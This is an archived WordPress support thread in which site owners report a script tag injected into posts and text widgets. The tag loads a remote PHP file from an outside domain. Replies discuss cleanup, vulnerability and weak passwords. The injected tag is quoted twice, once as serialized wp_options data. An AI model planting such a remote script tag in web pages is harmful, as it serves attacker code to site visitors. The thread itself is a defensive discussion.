Title: Unwanted java scripts added to posts
Last modified: August 20, 2016

---

# Unwanted java scripts added to posts

 *  Resolved [dewetvanrensburg](https://wordpress.org/support/users/dewetvanrensburg/)
 * (@dewetvanrensburg)
 * [13 years, 10 months ago](https://wordpress.org/support/topic/unwanted-java-scripts-added-to-posts/)
 * For the past week I receive warnings on a site I have been running for over a
   year.
    When visiting the site, in chrome, it’s promts me that ‘java needs my 
   permission to run’ Thereafter, I receive a security warning : “The application’s
   digital signature cannot be verified. Do you want to run the application?’
 * When logging into the dashboard, some of my posts had unwanted scripts in the
   Header :
    `<script type="text/javascript" src="http://chezbruna.com.br/imagens/
   rebots.php"></script>`
 * I removed the unwanted scripts from the posts, but I still get the prompts and
   warnings – what do I do next?

Viewing 9 replies - 1 through 9 (of 9 total)

 *  [s_ha_dum](https://wordpress.org/support/users/apljdi/)
 * (@apljdi)
 * [13 years, 10 months ago](https://wordpress.org/support/topic/unwanted-java-scripts-added-to-posts/#post-2988924)
 * Sounds like you’ve been hacked.
 * [FAQ: My Site Was Hacked](http://codex.wordpress.org/FAQ_My_site_was_hacked)
 * That chezbruna site is not a WordPress site, so I am guessing that isn’t your
   domain?
 *  [waldito](https://wordpress.org/support/users/waldito/)
 * (@waldito)
 * [13 years, 10 months ago](https://wordpress.org/support/topic/unwanted-java-scripts-added-to-posts/#post-2988954)
 * Same problem here, just a few hours ago this thing ‘started’ on my site too: 
   alaputacalle.com
 *  [MickeyRoush](https://wordpress.org/support/users/mickeyroush/)
 * (@mickeyroush)
 * [13 years, 10 months ago](https://wordpress.org/support/topic/unwanted-java-scripts-added-to-posts/#post-2988955)
 * @ waldito
 * [http://sitecheck.sucuri.net/results/alaputacalle.com](http://sitecheck.sucuri.net/results/alaputacalle.com)
 *  [waldito](https://wordpress.org/support/users/waldito/)
 * (@waldito)
 * [13 years, 10 months ago](https://wordpress.org/support/topic/unwanted-java-scripts-added-to-posts/#post-2988956)
 * Yes. I already been there before coming here. Still, it puzzles me how they have
   done it. So far, templates are clean, and php files are clean. That Iframe that
   appears on my template… is somehow inserted vía javascript or something.
 * My knowledge is quite limited!
 * So far ran three diferent antivirus plugins, no luck finding ‘the sting’. It 
   may be on the MySQL database…
 *  [waldito](https://wordpress.org/support/users/waldito/)
 * (@waldito)
 * [13 years, 10 months ago](https://wordpress.org/support/topic/unwanted-java-scripts-added-to-posts/#post-2988957)
 * It was there indeed… I found it on wp_options as a text widget.
 * a:2:{i:3;a:3:{s:5:”title”;s:2:”
    “;s:4:”text”;s:91:”<script type=”text/javascript”
   src=”[http://chezbruna.com.br/imagens/rebots.php”></script&gt](http://chezbruna.com.br/imagens/rebots.php”></script&gt);“;
   s:6:”filter”;b:0;}s:12:”_multiwidget”;i:1;}
 * I couldn’t figure out how they were loading that text widget on my theme yet.
 *  Thread Starter [dewetvanrensburg](https://wordpress.org/support/users/dewetvanrensburg/)
 * (@dewetvanrensburg)
 * [13 years, 10 months ago](https://wordpress.org/support/topic/unwanted-java-scripts-added-to-posts/#post-2988962)
 * I also found all mine (I hope).
 * Most were just added to my post headings, but found a sneaky one in a text widget.
   
   I am changing my passwords all over just to be a little more protected.
 *  [s_ha_dum](https://wordpress.org/support/users/apljdi/)
 * (@apljdi)
 * [13 years, 10 months ago](https://wordpress.org/support/topic/unwanted-java-scripts-added-to-posts/#post-2988972)
 * Finding the symptom, the script that was output, does not mean that you have 
   found the problem. Something on your sites is vulnerable. Removing the nasty 
   Javascript doesn’t remove the vulnerability that let the code get put on the 
   site in the first place. Please follow all of the instructions in the Hacked 
   Faq– [FAQ: My Site Was Hacked](http://codex.wordpress.org/FAQ_My_site_was_hacked)
 *  [RugaCH](https://wordpress.org/support/users/rugach/)
 * (@rugach)
 * [13 years, 10 months ago](https://wordpress.org/support/topic/unwanted-java-scripts-added-to-posts/#post-2988975)
 * My site was affected too – it started last night.
    It’s a huge coincidence that
   all are affected by the same injection – maybe a vulnerability in WP?
 *  [aleflocco](https://wordpress.org/support/users/aleflocco/)
 * (@aleflocco)
 * [13 years, 9 months ago](https://wordpress.org/support/topic/unwanted-java-scripts-added-to-posts/#post-2989002)
 * Hi,
 * I had the same issues, than I installed a login log plugin (I used this, [http://wordpress.org/extend/plugins/simple-login-log/](http://wordpress.org/extend/plugins/simple-login-log/))
   and found that one of site administrators logged in from different places in 
   the world (the plugin shows the IP)…
 * I asked him which was his password, and it was extremely weak!
    So, as told me
   by our provider, the problem could be a too week login password.
 * Oh, I mentioned that plugin ONLY because I used that, I have nothing to share
   with it or its author 😉
 * Hope this helps
    Alessandro

Viewing 9 replies - 1 through 9 (of 9 total)

The topic ‘Unwanted java scripts added to posts’ is closed to new replies.

 * In: [Fixing WordPress](https://wordpress.org/support/forum/how-to-and-troubleshooting/)
 * 9 replies
 * 6 participants
 * Last reply from: [aleflocco](https://wordpress.org/support/users/aleflocco/)
 * Last activity: [13 years, 9 months ago](https://wordpress.org/support/topic/unwanted-java-scripts-added-to-posts/#post-2989002)
 * Status: resolved

## Topics

### Topics with no replies

### Non-support topics

### Resolved topics

### Unresolved topics

### All topics